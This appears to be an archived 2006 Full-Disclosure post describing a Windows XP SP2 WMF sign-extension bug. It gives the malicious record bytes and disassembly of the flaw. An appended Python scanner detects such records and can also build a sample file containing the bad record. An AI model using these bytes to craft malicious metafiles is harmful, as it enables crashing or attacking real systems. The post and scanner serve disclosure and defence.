[Full-disclosure] 0-day XP SP2 wmf exploit (some details)

2006-08-07 00:00:00
vulners.com

Here are some details for wannabes :)

  1. 'Bad' wmf record:

    07 00 00 00               ; length of record (in words)
    FC 02                     ; type (CreateBrushIndirect)
    08 00 00 00 00 00 00 80   ; 'packed' (good old Win16 days) LOGBRUSH data:
        08 00                 - 'packed' lbStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
        00 00 00 00           - COLORREF (any)
        00 80                 - 'packed' lbHatch (any, signed)

  2. Sign extension bug:

    _CommonEnumMetaFile:

    ; normalize 'packed' LOGBRUSH
    movzx eax, word ptr [ebx+6]   ; lbStyle (UINT32(UINT16))
    mov [ebp-0f8], eax
    mov eax, [ebx+8]              ; COLORREF (as is)
    mov [ebp-0f4], eax
    movsx eax, word ptr [ebx+0c]  ; <-- BUGBUG: lbHatch (UINT32(INT16))
    mov [ebp-0f0], eax            ; lbHatch store (assumed; the post omits it, offset follows the two stores above)
    lea eax, [ebp-0f8]
    push eax
    call _CreateBrushIndirect

  3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:

    cmp edi, 6                    ; BS_DIBPATTERNPT == lbStyle
    jz _go2crush

    cmp edi, 8                    ; BS_DIBPATTERN8X8 == lbStyle
    jz _go2crush

    _go2crush:
    push esi
    push 1
    mov eax, [ebp+10]
    push eax
    push dword ptr [ebp+0c]       ; 1
    push dword ptr [ebp+18]       ; lpHatch (fake *packedDIB)
    call _pbmiConvertInfo


    _pbmiConvertInfo:

    push ebx
    mov ebx, [ebp+8]              ; lpHatch (fake *packedDIB)

    mov eax, [ebx]                ; <-- BUGBUG: crush or random (in first 0x7f00 bytes)
                                  ; memory access (see @ 0x3000 region)

good luck,
cyanid-E


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
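Added example, not part of the post above: a small Python scanner that walks the records of a WMF file and flags every CreateBrushIndirect record whose packed LOGBRUSH carries lbStyle 6 or 8, the condition under which GDI treats the sign-extended 16-bit lbHatch as a pointer to a packed DIB. The bad record bytes are the ones quoted in the post; the METAHEADER, the benign solid-brush record and the build_wmf helper are constructed here for the sample.

```python
import struct

META_EOF = 0x0000
META_CREATEBRUSHINDIRECT = 0x02FC
PLACEABLE_MAGIC = 0x9AC6CDD7
# lbStyle values for which GDI treats lbHatch as a pointer to a packed DIB;
# a raw pointer can never be legitimate inside a serialized metafile.
POINTER_BRUSH_STYLES = {6: "BS_DIBPATTERNPT", 8: "BS_DIBPATTERN8X8"}

def iter_wmf_records(data):
    """Yield (offset, function, params) for every record in a WMF blob."""
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_MAGIC:
        off = 22  # skip the 22-byte placeable (Aldus) header
    header_words = struct.unpack_from("<H", data, off + 2)[0]
    off += header_words * 2  # METAHEADER is normally 9 words = 18 bytes
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        end = off + size_words * 2
        if size_words < 3 or end > len(data):
            raise ValueError("malformed record size at offset %d" % off)
        yield off, func, data[off + 6:end]
        if func == META_EOF:
            break
        off = end

def find_suspicious_brushes(data):
    """Return (offset, style_name, lbHatch, lbHatch sign-extended to 32 bits) for
    every CreateBrushIndirect record that asks GDI to dereference lbHatch."""
    hits = []
    for off, func, params in iter_wmf_records(data):
        if func != META_CREATEBRUSHINDIRECT or len(params) < 8:
            continue
        style, _color, hatch = struct.unpack_from("<HIh", params, 0)  # packed LOGBRUSH
        if style in POINTER_BRUSH_STYLES:
            # the movsx in _CommonEnumMetaFile widens INT16 lbHatch to UINT32
            hits.append((off, POINTER_BRUSH_STYLES[style], hatch, hatch & 0xFFFFFFFF))
    return hits

# Constructed sample data: the record from the post, a benign solid brush, META_EOF.
BAD_RECORD = bytes.fromhex("07000000 fc02 0800 00000000 0080")
BENIGN_RECORD = bytes.fromhex("07000000 fc02 0000 ff000000 0000")
EOF_RECORD = bytes.fromhex("03000000 0000")

def build_wmf(*records):
    """Wrap records in a minimal 18-byte METAHEADER (constructed, not from the post)."""
    body = b"".join(records) + EOF_RECORD
    max_words = max(struct.unpack_from("<I", r, 0)[0] for r in records + (EOF_RECORD,))
    return struct.pack("<HHHIHIH", 1, 9, 0x300, (18 + len(body)) // 2, 1, max_words, 0) + body
```

On the post's record the scanner reports lbStyle BS_DIBPATTERN8X8 with lbHatch 0x8000 widened to 0xFFFF8000, which is exactly the value the sign-extension bug hands to _pbmiConvertInfo as a DIB pointer.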